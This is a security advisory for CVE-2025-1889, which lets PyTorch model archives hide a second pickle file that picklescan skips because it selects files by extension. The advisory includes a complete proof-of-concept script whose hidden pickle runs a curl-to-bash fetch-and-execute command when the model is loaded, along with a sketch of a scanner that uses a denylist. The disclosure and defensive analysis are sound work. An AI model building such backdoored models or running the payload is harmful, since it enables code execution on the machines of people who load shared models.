CVE-2025-1889

Summary

Picklescan fails to detect hidden pickle files embedded in PyTorch model archives because it relies on file extensions to decide what to scan. This allows an attacker to embed a secondary, malicious pickle file with a non-standard extension inside a model archive; the file goes undetected by picklescan but is still loaded by PyTorch's torch.load() function, leading to arbitrary code execution when the model is loaded.

Details

Picklescan primarily identifies pickle files by their extensions (e.g., .pkl, .pt). However, PyTorch allows an alternative pickle file inside a model archive to be selected via the pickle_file keyword argument of torch.load(). This makes it possible to embed a malicious pickle file (e.g., config.p) inside the model while keeping the primary data.pkl file benign.

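As a minimal sketch of that mechanism (assuming a zip-based checkpoint that already contains an extra record named config.p next to the usual data.pkl), the alternative pickle can be selected directly at load time:

import torch

# Assumes "model.pt" already contains a record "config.p" alongside data.pkl.
# The pickle_file keyword is forwarded to PyTorch's internal unpickling step,
# so config.p is deserialized instead of data.pkl; weights_only=False permits
# arbitrary objects to be reconstructed.
torch.load("model.pt", pickle_file="config.p", weights_only=False)
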
A typical attack works as follows: the attacker ships a checkpoint whose primary data.pkl carries no payload of its own, only an object that re-invokes torch.load with pickle_file pointed at a hidden pickle appended to the archive under a non-standard extension. The PoC below performs each step.

PoC

import os
import pickle
import zipfile
from functools import partial

import torch

model_name = "model.pt"


# Payload executed when the hidden pickle is deserialized.
class RemoteCodeExecution:
    def __reduce__(self):
        return os.system, ("curl -s http://localhost:8080 | bash",)


# Stage the hidden malicious pickle in a local "model/" directory; the
# directory name matches the prefix torch.save uses for records inside the
# archive, so the injected copy ends up next to data.pkl.
os.makedirs("model", exist_ok=True)
with open("model/config.p", "wb") as f:
    pickle.dump(RemoteCodeExecution(), f)

# Create a benign-looking model.
model = {}


# Helper whose __reduce__ uses functools.partial to defer a call to torch.load
# that points at the hidden pickle inside the same archive.
class AutoLoad:
    def __init__(self, path, **kwargs):
        self.path = path
        self.kwargs = kwargs

    def __reduce__(self):
        # Unpickling this object calls
        # torch.load(self.path, pickle_file="config.p", weights_only=False).
        return partial(torch.load, self.path, **self.kwargs), ()


model["config"] = AutoLoad(model_name, pickle_file="config.p", weights_only=False)
torch.save(model, model_name)

# Inject the second pickle into the saved model archive under a non-standard
# extension that extension-based scanners ignore.
with zipfile.ZipFile(model_name, "a") as archive:
    archive.write("model/config.p", "model/config.p")

# Loading the model triggers the nested torch.load of config.p, which runs the
# payload. Recent PyTorch releases default to weights_only=True, so the victim
# would have to pass weights_only=False (the default in older versions).
torch.load(model_name, weights_only=False)

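To see why an extension-based scan misses the payload, it helps to list the crafted archive's members after running the PoC. A quick check (exact record names other than data.pkl and the injected config.p vary by PyTorch version):

import zipfile

# Only data.pkl carries a pickle-like name; the injected config.p does not,
# so a scanner that selects files by extension never inspects it.
with zipfile.ZipFile("model.pt") as archive:
    for name in archive.namelist():
        print(name)  # e.g. model/data.pkl, ..., model/config.p
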
Impact

Severity: High

Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models.
What is the impact? Attackers can embed malicious code in PyTorch models that remains undetected but executes when the model is loaded.
Potential Exploits: This vulnerability could be exploited in supply chain attacks, backdooring pre-trained models distributed via repositories like Hugging Face or PyTorch Hub.

Recommendations
- Treat torch.load as an unsafe global when it is referenced from within a pickle, since it can be used to deserialize a secondary pickle from the same archive.
- Block functools.partial, which lets an attacker defer a call to a dangerous callable such as torch.load until the object is unpickled. A rough sketch of both checks follows this list.
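
For illustration only (this is not picklescan's actual implementation), the sketch below walks every member of a zip-based model archive regardless of its extension, extracts the globals each pickle stream references using pickletools, and flags anything on a denylist. The UNSAFE_GLOBALS set and the opcode-walking heuristic are assumptions made for this sketch.

import pickletools
import zipfile

# Hypothetical denylist for this sketch: callables that should not appear as
# pickle globals in a model file.
UNSAFE_GLOBALS = {
    ("os", "system"),
    ("builtins", "eval"),
    ("builtins", "exec"),
    ("torch", "load"),
    ("functools", "partial"),
}


def globals_in_pickle(data: bytes):
    """Best-effort extraction of (module, name) pairs a pickle references."""
    strings = []
    for opcode, arg, _pos in pickletools.genops(data):
        if "STRING" in opcode.name or "UNICODE" in opcode.name:
            strings.append(arg)  # remember pushed strings for STACK_GLOBAL
        elif opcode.name == "GLOBAL":
            module, name = arg.split(" ", 1)
            yield module, name
        elif opcode.name == "STACK_GLOBAL" and len(strings) >= 2:
            # Protocol 4+: module and name are the two most recent strings.
            yield strings[-2], strings[-1]


def scan_archive(path: str):
    """Scan every archive member, regardless of extension, for unsafe globals."""
    findings = []
    with zipfile.ZipFile(path) as archive:
        for member in archive.namelist():
            data = archive.read(member)
            hits = []
            try:
                for ref in globals_in_pickle(data):
                    if ref in UNSAFE_GLOBALS:
                        hits.append(ref)
            except Exception:
                pass  # member is not a parseable pickle stream; ignore it
            if hits:
                findings.append((member, hits))
    return findings


if __name__ == "__main__":
    for member, hits in scan_archive("model.pt"):
        print(f"{member}: references unsafe globals {hits}")

Run against the PoC archive, this approach would report both data.pkl (which references torch.load and functools.partial) and the injected config.p (which references os.system), even though config.p lacks a pickle extension.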